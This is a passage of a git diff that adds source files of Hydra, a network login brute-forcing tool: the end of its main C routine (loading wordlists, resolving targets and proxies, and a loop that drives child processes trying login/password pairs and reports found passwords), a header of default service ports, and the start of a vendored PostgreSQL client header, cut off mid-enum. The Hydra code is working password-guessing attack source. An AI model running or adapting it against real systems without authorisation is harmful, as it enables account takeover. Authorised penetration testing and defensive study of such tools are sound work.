hydra_brains.sizepass); + exit(-1); + } + pass_ptr = malloc(hydra_brains.sizepass + hydra_brains.countpass + 8); + if (pass_ptr == NULL) + bail("Could not allocate enough memory for password file data"); + memset(pass_ptr, 0, hydra_brains.sizepass + hydra_brains.countpass + 8); + fill_mem(pass_ptr, pfp, 0); + } else { + if (hydra_options.pass != NULL) { + pass_ptr = hydra_options.pass; + hydra_brains.countpass = 1; + hydra_brains.sizepass = strlen(hydra_options.pass) + 1; + } else { + if (hydra_options.bfg) { +#ifdef HAVE_MATH_H + if (bf_init(bf_options.arg)) + exit(-1); // error description is handled by bf_init + pass_ptr = bf_next(); + hydra_brains.countpass += bf_get_pcount(); + hydra_brains.sizepass += BF_BUFLEN; +#else + sleep(1); +#endif + } else { + pass_ptr = hydra_options.pass = empty_login; + hydra_brains.countpass = 0; + hydra_brains.sizepass = 1; + } + } + } + } else { + if ((cfp = fopen(hydra_options.colonfile, "r")) == NULL) + bail("File with login:password information not found!"); + hydra_brains.countlogin = countlines(cfp, 1); + hydra_brains.sizelogin = size_of_data; + if (hydra_brains.countlogin == 0) + bail("File for login:password information is empty!"); + if (hydra_brains.countlogin > MAX_LINES / 2) { + fprintf(stderr, "[ERROR] Maximum number of colon file entries is %d, this file has %lu entries.\n", MAX_LINES / 2, hydra_brains.countlogin); + exit(-1); + } + if (hydra_brains.sizelogin > MAX_BYTES / 2) { + fprintf(stderr, "[ERROR] Maximum size of the colon file is %d, this file has %lu bytes.\n", MAX_BYTES / 2, (unsigned long int) hydra_brains.sizelogin); + exit(-1); + } + csv_ptr = malloc(hydra_brains.sizelogin + 2 * hydra_brains.countlogin + 8); + if (csv_ptr == NULL) + bail("Could not allocate enough memory for colon file data"); + memset(csv_ptr, 0, hydra_brains.sizelogin + 2 * hydra_brains.countlogin + 8); + fill_mem(csv_ptr, cfp, 1); +//printf("count: %d, size: %d\n", hydra_brains.countlogin, hydra_brains.sizelogin); +//hydra_dump_data(csv_ptr, hydra_brains.sizelogin + hydra_brains.countlogin + 8, "colon data"); + hydra_brains.countpass = 1; + pass_ptr = login_ptr = csv_ptr; + while (*pass_ptr != 0) + pass_ptr++; + pass_ptr++; + } + + hydra_brains.countpass += hydra_options.try_password_reverse_login + hydra_options.try_password_same_as_login + hydra_options.try_null_password; + if ((memcheck = malloc(102400)) == NULL) { + fprintf(stderr, "[ERROR] your wordlist is too large, not enough memory!\n"); + exit(-1); + } + free(memcheck); + if ((rfp = fopen(RESTOREFILE, "r")) != NULL) { + fprintf(stderr, "[WARNING] Restorefile (%s) from a previous session found, to prevent overwriting, you have 10 seconds to abort...\n", RESTOREFILE); + sleep(10); + fclose(rfp); + } + + if (hydra_options.infile_ptr != NULL) { + if ((ifp = fopen(hydra_options.infile_ptr, "r")) == NULL) + bail("File for IP addresses not found!"); + hydra_brains.targets = countservers = countinfile = countlines(ifp, 0); + if (countinfile == 0) + bail("File for IP addresses is empty!"); + hydra_targets = malloc(sizeof(hydra_targets) * (countservers + 1) + 8); + if (hydra_targets == NULL) + bail("Could not allocate enough memory for target data"); + sizeinfile = size_of_data; + if (countinfile > MAX_LINES / 1000) { + fprintf(stderr, "[ERROR] Maximum number of target file entries is %d, this file has %d entries.\n", MAX_LINES / 1000, (int)countinfile); + exit(-1); + } + if (sizeinfile > MAX_BYTES / 1000) { + fprintf(stderr, "[ERROR] Maximum size of the server file is %d, this file has %d bytes.\n", MAX_BYTES / 1000, (int)sizeinfile); + exit(-1); + } + if ((servers_ptr = malloc(sizeinfile + countservers + 8)) == NULL) + bail("Could not allocate enough memory for target file data"); + memset(servers_ptr, 0, sizeinfile + countservers + 8); + fill_mem(servers_ptr, ifp, 0); + sizeservers = sizeinfile; + tmpptr = servers_ptr; + for (i = 0; i < countinfile; i++) { + hydra_targets[i] = malloc(sizeof(hydra_target)); + memset(hydra_targets[i], 0, sizeof(hydra_target)); + hydra_targets[i]->target = tmpptr; + while (*tmpptr != 0) + tmpptr++; + tmpptr++; + } + } else { + countservers = hydra_brains.targets = 1; + hydra_targets = malloc(sizeof(hydra_targets)); + hydra_targets[0] = malloc(sizeof(hydra_target)); + memset(hydra_targets[0], 0, sizeof(hydra_target)); + hydra_targets[0]->target = servers_ptr = hydra_options.server; + sizeservers = strlen(hydra_options.server) + 1; + } + for (i = 0; i < hydra_brains.targets; i++) { + hydra_targets[i]->login_ptr = login_ptr; + hydra_targets[i]->pass_ptr = pass_ptr; + if (hydra_options.loop_mode) { + if (hydra_options.try_password_same_as_login) + hydra_targets[i]->pass_state = 0; + else if (hydra_options.try_null_password) { + hydra_targets[i]->pass_ptr = empty_login; + hydra_targets[i]->pass_state = 1; + } else if (hydra_options.try_password_reverse_login) + hydra_targets[i]->pass_state = 2; + else + hydra_targets[i]->pass_state = 3; + } + } + } // END OF restore == 0 + + if (getenv("HYDRA_PROXY") && use_proxy == 0) { + printf("[INFO] Using Connect Proxy: %s\n", getenv("HYDRA_PROXY")); + use_proxy = 2; + } + if (use_proxy == 1) + proxy_string = getenv("HYDRA_PROXY_HTTP"); + if (use_proxy == 2) + proxy_string = getenv("HYDRA_PROXY"); + if (proxy_string != NULL && proxy_string[0] != 0) { + if (strstr(proxy_string, "//") != NULL) { + char *dslash = strstr(proxy_string, "://"); + + if (dslash) { + proxy_string[dslash - proxy_string] = 0; + strncpy(proxy_string_type, proxy_string, sizeof(proxy_string_type)); + } + + proxy_string = dslash; + proxy_string += 3; + } + if (proxy_string[strlen(proxy_string) - 1] == '/') + proxy_string[strlen(proxy_string) - 1] = 0; + if ((tmpptr = index(proxy_string, ':')) == NULL) + use_proxy = 0; + else { + *tmpptr = 0; + tmpptr++; + memset(&hints, 0, sizeof hints); + if ((device = index(proxy_string, '%')) != NULL) + *device++ = 0; + if (getaddrinfo(proxy_string, NULL, &hints, &res) != 0) { + fprintf(stderr, "[ERROR] could not resolve proxy address: %s\n", proxy_string); + exit(-1); + } else { + for (p = res; p != NULL; p = p->ai_next) { +#ifdef AF_INET6 + if (p->ai_family == AF_INET6) { + if (ipv6 == NULL) + ipv6 = (struct sockaddr_in6 *) p->ai_addr; + } else +#endif + if (p->ai_family == AF_INET) { + if (ipv4 == NULL) + ipv4 = (struct sockaddr_in *) p->ai_addr; + } + } + freeaddrinfo(res); +#ifdef AF_INET6 + if (ipv6 != NULL && (ipv4 == NULL || prefer_ipv6)) { + proxy_string_ip[0] = 16; + memcpy(proxy_string_ip + 1, (char *) &ipv6->sin6_addr, 16); + if (device != NULL && strlen(device) <= 16) + strcpy(proxy_string_ip + 17, device); + if (memcmp(proxy_string_ip + 1, fe80, 2) == 0) { + if (device == NULL) { + fprintf(stderr, "[ERROR] The proxy address is a link local address, link local addresses require the interface being defined like this: fe80::1%%eth0\n"); + exit(-1); + } + } + } else +#endif + if (ipv4 != NULL) { + proxy_string_ip[0] = 4; + memcpy(proxy_string_ip + 1, (char *) &ipv4->sin_addr, 4); + } else { + fprintf(stderr, "[ERROR] Could not resolve proxy address: %s\n", proxy_string); + exit(-1); + } + } + proxy_string_port = atoi(tmpptr); + } + if (use_proxy == 0) + fprintf(stderr, "[WARNING] invalid proxy definition. Syntax: \"HYDRA_PROXY=[connect|socks[4|5]]://1.2.3.4:3128/\".\n"); + } else + use_proxy = 0; + if (use_proxy > 0 && (tmpptr = getenv("HYDRA_PROXY_AUTH")) != NULL && tmpptr[0] != 0) { + if (index(tmpptr, ':') == NULL) { + fprintf(stderr, "[WARNING] invalid proxy authentication. Syntax: \"login:password\". Ignoring ...\n"); + } else { + proxy_authentication = malloc(strlen(tmpptr) * 2 + 50); + strcpy(proxy_authentication, tmpptr); + if (hydra_strcasestr(proxy_string_type, "socks") == NULL) + hydra_tobase64((unsigned char *) proxy_authentication, strlen(proxy_authentication), strlen(tmpptr) * 2 + 8); + } + } + + if (hydra_options.restore == 0) { + if ((strcmp(hydra_options.service, "rsh") == 0) || (strcmp(hydra_options.service, "oracle-sid") == 0)) + math2 = hydra_brains.countlogin; + else + math2 = hydra_brains.countlogin * hydra_brains.countpass; + +#ifdef HAVE_MATH_H + if (hydra_options.bfg) { + math2 = hydra_brains.countlogin * bf_get_pcount(); + } +#endif + + hydra_brains.todo = math2; + math2 = math2 * hydra_brains.targets; + hydra_brains.todo_all = math2; + if (hydra_brains.todo_all == 0) + bail("No login/password combination given!"); + if (hydra_brains.todo < hydra_options.tasks) { + if (verbose && hydra_options.tasks != TASKS) + printf("[VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to %lu\n", hydra_brains.todo); + hydra_options.tasks = hydra_brains.todo; + } + } + if (hydra_options.max_use < hydra_brains.targets * hydra_options.tasks) + hydra_options.max_use = hydra_brains.targets * hydra_options.tasks; + if (hydra_options.max_use > MAXTASKS) + hydra_options.max_use = MAXTASKS; + if (hydra_options.max_use < hydra_brains.targets * hydra_options.tasks) { + if ((hydra_options.tasks = hydra_options.max_use / hydra_brains.targets) == 0) + hydra_options.tasks = 1; + fprintf(stderr, "[WARNING] More tasks defined per server than allowed for maximal connections. Tasks reduced to %d.\n", hydra_options.tasks); + } else { + if (hydra_options.tasks > MAXTASKS) { + fprintf(stderr, "[WARNING] reducing tasks to MAXTASKS (%d)\n", MAXTASKS); + hydra_options.tasks = MAXTASKS; + } + } + hydra_options.max_use = hydra_brains.targets * hydra_options.tasks; + if (hydra_options.max_use > MAXTASKS) + hydra_options.max_use = MAXTASKS; + math2 = hydra_brains.todo_all / hydra_options.tasks; + // set options (bits!) + options = 0; + if (hydra_options.ssl) + options = options | OPTION_SSL; + if (hydra_options.colonfile != NULL) + printf("[DATA] %d task%s, %d server%s, %lu login tr%s, ~%lu tr%s per task\n", hydra_options.tasks, hydra_options.tasks == 1 ? "" : "s", hydra_brains.targets, + hydra_brains.targets == 1 ? "" : "s", hydra_brains.todo, hydra_brains.todo == 1 ? "y" : "ies", math2, math2 == 1 ? "y" : "ies"); + else + printf("[DATA] %d task%s, %d server%s, %lu login tr%s (l:%lu/p:%lu), ~%lu tr%s per task\n", hydra_options.tasks, hydra_options.tasks == 1 ? "" : "s", hydra_brains.targets, + hydra_brains.targets == 1 ? "" : "s", hydra_brains.todo, hydra_brains.todo == 1 ? "y" : "ies", (unsigned long int) hydra_brains.countlogin, + (unsigned long int) hydra_brains.countpass, math2, math2 == 1 ? "y" : "ies"); + if (port < 1) + if ((port = hydra_lookup_port(hydra_options.service)) < 1) { + fprintf(stderr, "[ERROR] No valid port set or no default port available. Use the -s Option\n"); + exit(-1); + } + + printf("[DATA] attacking service %s on port %d\n", hydra_options.service, port); + + if (hydra_options.outfile_ptr != NULL) { + if ((hydra_brains.ofp = fopen(hydra_options.outfile_ptr, "a+")) == NULL) { + perror("[ERROR] Error creating outputfile"); + exit(-1); + } + fprintf(hydra_brains.ofp, "# %s %s run at %s on %s %s (%s ", PROGRAM, VERSION, hydra_build_time(), + hydra_options.server == NULL ? hydra_options.infile_ptr : hydra_options.server, hydra_options.service, prg); + for (i = 1; i < argc; i++) + fprintf(hydra_brains.ofp, " %s", argv[i]); + fprintf(hydra_brains.ofp, ")\n"); + } + // we have to flush all writeable buffered file pointers before forking + // set appropriate signals for mother + signal(SIGCHLD, killed_childs); + signal(SIGTERM, kill_children); +#ifdef SIGBUS + signal(SIGBUS, kill_children); +#endif + if (debug == 0) + signal(SIGSEGV, kill_children); + signal(SIGHUP, kill_children); + signal(SIGINT, kill_children); + signal(SIGPIPE, SIG_IGN); + if (verbose) + printf("[VERBOSE] Resolving addresses ... "); + if (debug) + printf("\n"); + for (i = 0; i < countservers; i++) { + if (debug) + printf("[DEBUG] resolving %s\n", hydra_targets[i]->target); + memset(&hints, 0, sizeof(hints)); + ipv4 = NULL; +#ifdef AF_INET6 + ipv6 = NULL; + if ((device = index(hydra_targets[i]->target, '%')) != NULL) + *device++ = 0; +#endif + if (getaddrinfo(hydra_targets[i]->target, NULL, &hints, &res) != 0) { + if (use_proxy == 0) { + if (verbose) + printf("[failed for %s] ", hydra_targets[i]->target); + else + fprintf(stderr, "[ERROR] could not resolve address: %s\n", hydra_targets[i]->target); + hydra_targets[i]->done = 3; + hydra_brains.finished++; + } + } else { + for (p = res; p != NULL; p = p->ai_next) { +#ifdef AF_INET6 + if (p->ai_family == AF_INET6) { + if (ipv6 == NULL) + ipv6 = (struct sockaddr_in6 *) p->ai_addr; + } else +#endif + if (p->ai_family == AF_INET) { + if (ipv4 == NULL) + ipv4 = (struct sockaddr_in *) p->ai_addr; + } + } +#ifdef AF_INET6 + if (ipv6 != NULL && (ipv4 == NULL || prefer_ipv6)) { + // IPV6 FIXME + if ((strcmp(hydra_options.service, "socks5") == 0) || (strcmp(hydra_options.service, "sip") == 0)) { + fprintf(stderr, "[ERROR] Target %s resolves to an IPv6 address, however module %s does not support this. Maybe try \"-4\" option. Sending in patches helps.\n", + hydra_targets[i]->target, hydra_options.service); + hydra_targets[i]->done = 3; + hydra_brains.finished++; + } else { + hydra_targets[i]->ip[0] = 16; + memcpy(&hydra_targets[i]->ip[1], (char *) &ipv6->sin6_addr, 16); + if (device != NULL && strlen(device) <= 16) + strcpy(&hydra_targets[i]->ip[17], device); + if (memcmp(&hydra_targets[i]->ip[17], fe80, 2) == 0) { + if (device == NULL) { + fprintf(stderr, "[ERROR] The target %s address is a link local address, link local addresses require the interface being defined like this: fe80::1%%eth0\n", + hydra_targets[i]->target); + exit(-1); + } + } + } + } else +#endif + if (ipv4 != NULL) { + hydra_targets[i]->ip[0] = 4; + memcpy(&hydra_targets[i]->ip[1], (char *) &ipv4->sin_addr, 4); + } else { + if (verbose) + printf("[failed for %s] ", hydra_targets[i]->target); + else + fprintf(stderr, "[ERROR] Could not resolve proxy address: %s\n", hydra_targets[i]->target); + hydra_targets[i]->done = 3; + hydra_brains.finished++; + } + freeaddrinfo(res); + } + } + if (verbose) + printf("done\n"); + if (hydra_brains.targets == 0) + bail("No server to scan!"); + +#ifndef SO_BINDTODEVICE + if (device != NULL) { + fprintf(stderr, "[ERROR] your operating system does not support SO_BINDTODEVICE or IP_FORCE_OUT_IFP, dunno how to bind the IPv6 address to the interface %s!\n", device); + } +#endif + + if (hydra_options.restore == 0) { + hydra_heads = malloc(sizeof(hydra_heads) * hydra_options.max_use); + target_no = 0; + for (i = 0; i < hydra_options.max_use; i++) { + hydra_heads[i] = malloc(sizeof(hydra_head)); + memset(hydra_heads[i], 0, sizeof(hydra_head)); + } + } + // here we call the init function of the relevant service module + // should we do the init centrally or should each child do that? + // that depends largely on the number of targets and maximum tasks +// if (hydra_brains.targets == 1 || (hydra_brains.targets < 4 && hydra_options.tasks / hydra_brains.targets > 4 && hydra_brains.todo > 15)) + for (i = 0; i < hydra_brains.targets; i++) + hydra_service_init(i); + + starttime = elapsed_status = elapsed_restore = time(NULL); + fflush(stdout); + fflush(stderr); + fflush(hydra_brains.ofp); + + hydra_debug(0, "attack"); + process_restore = 1; + + // this is the big function which starts the attacking children, feeds login/password pairs, etc.! + while (exit_condition == 0) { + FD_ZERO(&fdreadheads); + for (head_no = 0, max_fd = 1; head_no < hydra_options.max_use; head_no++) { + if (hydra_heads[head_no]->active > 0) { + FD_SET(hydra_heads[head_no]->sp[0], &fdreadheads); + if (max_fd < hydra_heads[head_no]->sp[0]) + max_fd = hydra_heads[head_no]->sp[0]; + } + } + my_select(max_fd + 1, &fdreadheads, NULL, NULL, 0, 200000); + tmp_time = time(NULL); + + for (head_no = 0; head_no < hydra_options.max_use; head_no++) { +// if (debug) printf("[DEBUG] head_no[%d] active %d\n", head_no, hydra_heads[head_no]->active); + switch (hydra_heads[head_no]->active) { + case -1: + // disabled head, ignored + break; + case 0: + if (hydra_heads[head_no]->redo) { + hydra_spawn_head(head_no, hydra_heads[head_no]->target_no); + } else { + if (hydra_brains.targets > 1) + hydra_heads[head_no]->target_no = hydra_select_target(); + if (debug) + printf("[DEBUG] child %d got target %d selected\n", head_no, hydra_heads[head_no]->target_no); + if (target_no < 0) + hydra_kill_head(head_no, 0, 2); + else + hydra_spawn_head(head_no, hydra_heads[head_no]->target_no); // target_no is ignored if head->redo == 1 + } + break; + case 1: + if (FD_ISSET(hydra_heads[head_no]->sp[0], &fdreadheads)) { + readres = read_safe(hydra_heads[head_no]->sp[0], &rc, 1); + if (readres > 0) { + FD_CLR(hydra_heads[head_no]->sp[0], &fdreadheads); + hydra_heads[head_no]->last_seen = tmp_time; + if (debug) + printf("[DEBUG] head_no[%d] read %c\n", head_no, rc); + switch (rc) { + // Valid Results: + // n - mother says to itself that child requests next login/password pair + // N - child requests next login/password pair + // Q - child reports that it is quitting + // C - child reports connect error (and is quitting) + // E - child reports protocol error (and is quitting) + // f - child reports that the username does not exist + // F - child reports that it found a valid login/password pair + // and requests next pair. Sends login/pw pair with next msg! + case 'N': // head wants next pair + hydra_targets[hydra_heads[head_no]->target_no]->ok = 1; + if (hydra_targets[hydra_heads[head_no]->target_no]->fail_count > 0) + hydra_targets[hydra_heads[head_no]->target_no]->fail_count--; + // no break here + case 'n': // mother sends this to itself initially + if (hydra_send_next_pair(hydra_heads[head_no]->target_no, head_no) == -1) { + hydra_kill_head(head_no, 1, 2); + } + break; + + case 'F': // valid password found + hydra_brains.found++; + if (hydra_options.exit_found) { // option set says quit target after on valid login/pass pair is found + for (j = 0; j < hydra_options.max_use; j++) + if (hydra_heads[j]->active >= 0 && (hydra_heads[j]->target_no == target_no || hydra_options.exit_found == 2)) + hydra_kill_head(j, 1, 2); // kill all heads working on the target + if (hydra_targets[hydra_heads[head_no]->target_no]->done == 0) { + hydra_targets[hydra_heads[head_no]->target_no]->done = 1; // mark target as done + hydra_brains.finished++; + printf("[STATUS] attack finished for %s (valid pair found)\n", hydra_targets[hydra_heads[head_no]->target_no]->target); + } + if (hydra_options.exit_found == 2) { + for (j = 0; j < hydra_brains.targets; j++) + if (hydra_targets[j]->done == 0) { + hydra_targets[j]->done = 1; + hydra_brains.finished++; + } + } + continue; + } + // fall through + case 'f': // username identified as invalid + hydra_targets[hydra_heads[head_no]->target_no]->ok = 1; + if (hydra_targets[hydra_heads[head_no]->target_no]->fail_count > 0) + hydra_targets[hydra_heads[head_no]->target_no]->fail_count--; + memset(buf, 0, sizeof(buf)); + read_safe(hydra_heads[head_no]->sp[0], buf, MAXBUF); + hydra_skip_user(hydra_heads[head_no]->target_no, buf); + fck = write(hydra_heads[head_no]->sp[1], "n", 1); // small hack + break; + + // we do not make a difference between 'C' and 'E' results - yet + case 'E': // head reports protocol error + case 'C': // head reports connect error + fck = write(hydra_heads[head_no]->sp[0], "Q", 1); + if (debug) { + printf("[ATTEMPT-ERROR] target %s - login \"%s\" - pass \"%s\" - child %d - %lu of %lu\n", + hydra_targets[hydra_heads[head_no]->target_no]->target, hydra_heads[head_no]->current_login_ptr, hydra_heads[head_no]->current_pass_ptr, head_no, + hydra_targets[hydra_heads[head_no]->target_no]->sent, hydra_brains.todo); + } + hydra_increase_fail_count(hydra_heads[head_no]->target_no, head_no); + break; + + case 'Q': // head reports its quitting + fck = write(hydra_heads[head_no]->sp[0], "Q", 1); + if (debug) + printf("[DEBUG] child %d reported it quit\n", head_no); + hydra_kill_head(head_no, 1, 0); + break; + + default: + fprintf(stderr, "[ERROR] child %d sent nonsense data, killing and restarting it!\n", head_no); + hydra_increase_fail_count(hydra_heads[head_no]->target_no, head_no); + } + } + if (readres == -1) { + if (verbose) + fprintf(stderr, "[WARNING] child %d seems to have died, restarting (this only happens if a module is bad) ... \n", head_no); + hydra_increase_fail_count(hydra_heads[head_no]->target_no, head_no); + } + } else { + if (hydra_heads[head_no]->last_seen + hydra_options.waittime > tmp_time) { + // check if recover of timed-out head is necessary + if (tmp_time > waittime + hydra_heads[head_no]->last_seen) { + if (kill(hydra_heads[head_no]->pid, 0) < 0) { + if (verbose) + fprintf(stderr, "[WARNING] child %d seems to be dead, restarting it ...\n", head_no); + hydra_increase_fail_count(hydra_heads[head_no]->target_no, head_no); + } + } + // if we do not get to hear anything for a longer time assume its dead + if (tmp_time > waittime * 2 + hydra_heads[head_no]->last_seen) { + if (verbose) + fprintf(stderr, "[WARNING] timeout from child %d, restarting\n", head_no); + hydra_increase_fail_count(hydra_heads[head_no]->target_no, head_no); + } + } + } + break; + default: + fprintf(stderr, "[ERROR] child %d in unknown state, restarting!\n", head_no); + hydra_increase_fail_count(hydra_heads[head_no]->target_no, head_no); + } + } + + usleep(USLEEP_LOOP); + (void) wait3(NULL, WNOHANG, NULL); + // write restore file and report status + if (process_restore == 1 && time(NULL) - elapsed_restore > 299) { + hydra_restore_write(0); + elapsed_restore = time(NULL); + } + + if (time(NULL) - elapsed_status > status_print) { + elapsed_status = time(NULL); + tmp_time = elapsed_status - starttime; + if (tmp_time < 1) + tmp_time = 1; + tmp_time = hydra_brains.sent / tmp_time; + if (tmp_time < 1) + tmp_time = 1; + if (status_print < 15 * 59) + status_print = ((status_print + 1) * 2) - 1; + if (status_print > 299 && (hydra_brains.todo_all - hydra_brains.sent) / tmp_time < 1500) + status_print = 299; + if (((hydra_brains.todo_all - hydra_brains.sent) / tmp_time) < 150) + status_print = 59; + k = 0; + for (j = 0; j < hydra_options.max_use; j++) + if (hydra_heads[j]->active >= 0) + k++; + printf("[STATUS] %.2f tries/min, %lu tries in %02lu:%02luh, %lu todo in %02lu:%02luh, %d active\n", (1.0 * hydra_brains.sent) / (((elapsed_status - starttime) * 1.0) / 60), // tries/min + hydra_brains.sent, // tries + (long unsigned int) ((elapsed_status - starttime) / 3600), // hours + (long unsigned int) (((elapsed_status - starttime) % 3600) / 60), // minutes + hydra_brains.todo_all - hydra_brains.sent < 0 ? 1 : hydra_brains.todo_all - hydra_brains.sent, // left todo + (long unsigned int) (((double) hydra_brains.todo_all - hydra_brains.sent) / ((double) hydra_brains.sent / (elapsed_status - starttime)) + ) / 3600, // hours + (((long unsigned int) (((double) hydra_brains.todo_all - hydra_brains.sent) / ((double) hydra_brains.sent / (elapsed_status - starttime)) + ) % 3600) / 60) + 1, // min + k); + } + + exit_condition = hydra_check_for_exit_condition(); + } + process_restore = 0; + if (debug) + printf("[DEBUG] while loop left with %d\n", exit_condition); + + j = k = error = 0; + for (i = 0; i < hydra_brains.targets; i++) + switch (hydra_targets[i]->done) { + case 3: + k++; + break; + case 2: + if (hydra_targets[i]->ok == 0) + k++; + else + error++; + break; + case 1: + break; + case 0: + if (hydra_targets[i]->ok == 0) + k++; + else + j++; + break; + default: + error++; + fprintf(stderr, "[ERROR] illegal target result value (%d=>%d)\n", i, hydra_targets[i]->done); + } + + for (i = 0; i < hydra_options.max_use; i++) + if (hydra_heads[i]->active > 0 && hydra_heads[i]->pid > 0) + hydra_kill_head(i, 1, 2); + (void) wait3(NULL, WNOHANG, NULL); + + printf("%d of %d target%s%scompleted, %lu valid password%s found\n", hydra_brains.targets - j - k - error, hydra_brains.targets, hydra_brains.targets == 1 ? " " : "s ", + hydra_brains.found > 0 ? "successfully " : "", hydra_brains.found, hydra_brains.found == 1 ? "" : "s"); + if (error == 0 && j == 0) { + process_restore = 0; + unlink(RESTOREFILE); + } else { + printf("[INFO] Writing restore file because %d server scan%s could not be completed\n", j + error, j + error == 1 ? "" : "s"); + hydra_restore_write(1); + } + if (error) { + fprintf(stderr, "[ERROR] %d target%s disabled because of too many errors\n", error, error == 1 ? " was" : "s were"); + error = 1; + } + if (k) { + fprintf(stderr, "[ERROR] %d target%s did not resolve or could not be connected\n", k, k == 1 ? "" : "s"); + error = 1; + } + if (j) { + fprintf(stderr, "[ERROR] %d target%s did not complete\n", j, j == 1 ? "" : "s"); + error = 1; + } + // yeah we did it + printf("%s (%s) finished at %s\n", PROGRAM, RESOURCE, hydra_build_time()); + if (hydra_brains.ofp != NULL && hydra_brains.ofp != stdout) + fclose(hydra_brains.ofp); + + fflush(NULL); + if (error || j || exit_condition < 0) + return -1; + else + return 0; +} diff --git a/hydra.h b/hydra.h new file mode 100644 index 0000000..af95552 --- /dev/null +++ b/hydra.h @@ -0,0 +1,130 @@ +#ifndef _HYDRA_H + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#ifdef HAVE_OPENSSL +#define HYDRA_SSL +#endif +#ifdef HAVE_SSL +#ifndef HYDRA_SSL +#define HYDRA_SSL +#endif +#endif + +#ifdef LIBSSH +#include +#endif + +#define OPTION_SSL 1 + +#define PORT_NOPORT -1 +#define PORT_FTP 21 +#define PORT_FTP_SSL 990 +#define PORT_TELNET 23 +#define PORT_TELNET_SSL 992 +#define PORT_HTTP 80 +#define PORT_HTTP_SSL 443 +#define PORT_HTTP_PROXY 3128 +#define PORT_HTTP_PROXY_SSL 3128 +#define PORT_POP3 110 +#define PORT_POP3_SSL 995 +#define PORT_NNTP 119 +#define PORT_NNTP_SSL 563 +#define PORT_SMB 139 +#define PORT_SMB_SSL 139 +#define PORT_SMBNT 445 +#define PORT_SMBNT_SSL 445 +#define PORT_IMAP 143 +#define PORT_IMAP_SSL 993 +#define PORT_LDAP 389 +#define PORT_LDAP_SSL 636 +#define PORT_REXEC 512 +#define PORT_REXEC_SSL 512 +#define PORT_RLOGIN 513 +#define PORT_RLOGIN_SSL 513 +#define PORT_RSH 514 +#define PORT_RSH_SSL 514 +#define PORT_SOCKS5 1080 +#define PORT_SOCKS5_SSL 1080 +#define PORT_ICQ 4000 +#define PORT_ICQ_SSL -1 +#define PORT_VNC 5900 +#define PORT_VNC_SSL 5901 +#define PORT_PCNFS 0 +#define PORT_PCNFS_SSL -1 +#define PORT_MYSQL 3306 +#define PORT_MYSQL_SSL 3306 +#define PORT_MSSQL 1433 +#define PORT_MSSQL_SSL 1433 +#define PORT_POSTGRES 5432 +#define PORT_POSTGRES_SSL 5432 +#define PORT_ORACLE 1521 +#define PORT_ORACLE_SSL 1521 +#define PORT_PCANYWHERE 5631 +#define PORT_PCANYWHERE_SSL 5631 +#define PORT_SAPR3 -1 +#define PORT_SAPR3_SSL -1 +#define PORT_SSH 22 +#define PORT_SSH_SSL 22 +#define PORT_SNMP 161 +#define PORT_SNMP_SSL 1993 +#define PORT_CVS 2401 +#define PORT_CVS_SSL 2401 +#define PORT_FIREBIRD 3050 +#define PORT_FIREBIRD_SSL 3050 +#define PORT_AFP 548 +#define PORT_AFP_SSL 548 +#define PORT_NCP 524 +#define PORT_NCP_SSL 524 +#define PORT_SVN 3690 +#define PORT_SVN_SSL 3690 +#define PORT_SMTP 25 +#define PORT_SMTP_SSL 465 +#define PORT_TEAMSPEAK 8767 +#define PORT_TEAMSPEAK_SSL 8767 +#define PORT_SIP 5060 +#define PORT_SIP_SSL 5061 +#define PORT_VMAUTHD 902 +#define PORT_VMAUTHD_SSL 902 +#define PORT_XMPP 5222 +#define PORT_XMPP_SSL 5223 +#define PORT_IRC 6667 +#define PORT_IRC_SSL 6697 +#define PORT_RDP 3389 +#define PORT_RDP_SSL 3389 +#define PORT_ASTERISK 5038 +#define PORT_ASTERISK_SSL 5038 +#define PORT_S7_300 102 +#define PORT_S7_300_SSL 102 +#define PORT_REDIS 6379 +#define PORT_REDIS_SSL 6379 + +#define False 0 +#define True 1 + +#ifndef INET_ADDRSTRLEN +#define INET_ADDRSTRLEN 16 +#endif + +#define _HYDRA_H +#endif diff --git a/libpq-fe.h b/libpq-fe.h new file mode 100644 index 0000000..7d08744 --- /dev/null +++ b/libpq-fe.h @@ -0,0 +1,410 @@ + +/*------------------------------------------------------------------------- + * + * libpq-fe.h + * This file contains definitions for structures and + * externs for functions used by frontend postgres applications. + * + * Portions Copyright (c) 1996-2003, PostgreSQL Global Development Group + * Portions Copyright (c) 1994, Regents of the University of California + * + * $Id: libpq-fe.h,v 1.100 2003/08/27 00:33:34 petere Exp $ + * + *------------------------------------------------------------------------- + */ + +#ifndef LIBPQ_FE_H +#define LIBPQ_FE_H + +#ifdef __cplusplus +extern "C" { +#endif + +#include + +/* + * postgres_ext.h defines the backend's externally visible types, + * such as Oid. + */ +#include "postgres_ext.h" + +/* SSL type is needed here only to declare PQgetssl() */ +#ifdef USE_SSL +#include +#endif + +/* Application-visible enum types */ + + typedef enum { + /* + * Although it is okay to add to this list, values which become unused + * should never be removed, nor should constants be redefined - that + * would break compatibility with existing code. + */ + CONNECTION_OK, + CONNECTION_BAD, + /* Non-blocking mode only below here */ + + /* + * The existence of these should never be relied upon - they should + * only be used for user feedback or similar purposes. + */ + CONNECTION_STARTED, /* Waiting for connection to be made. */ + CONNECTION_MADE, /* Connection OK; waiting to send. */ + CONNECTION_AWAITING_RESPONSE, /* Waiting for a response from the + * postmaster. */ + CONNECTION_AUTH_OK, /* Received authentication; waiting for + * backend startup. */ + CONNECTION_SETENV, /* Negotiating environment. */ + CONNECTION_SSL_STARTUP, /* Negotiating SSL. */ + CONNECTION_NEEDED /* Internal state: connect() needed */ + } ConnStatusType; + + typedef enum { + PGRES_POLLING_FAILED = 0, + PGRES_POLLING_READING, /* These two indicate that one may */ + PGRES_POLLING_WRITING, /* use select before polling again. */ + PGRES_POLLING_OK, + PGRES_POLLING_ACTIVE /* unused; keep for awhile for backwards + * compatibility */ + } PostgresPollingStatusType; + + typedef enum { + PGRES_EMPTY_QUERY = 0, /* empty query string was executed */ + PGRES_COMMAND_OK, /* a query command that doesn't return + * anything was executed properly by the + * backend */ + PGRES_TUPLES_OK, /* a query command that returns tuples was + * executed properly by the backend, + * PGresult contains the result tuples */ + PGRES_COPY_OUT, /* Copy Out data transfer in progress */ + PGRES_COPY_IN, /* Copy In data transfer in progress */ + PGRES_BAD_RESPONSE, /* an unexpected response was recv'd from + * the backend */ + PGRES_NONFATAL_ERROR, /* notice or warning message */ + PGRES_FATAL_ERROR /* query failed */ + } ExecStatusType; + + typedef enum { + PQTRANS_IDLE, /* connection idle 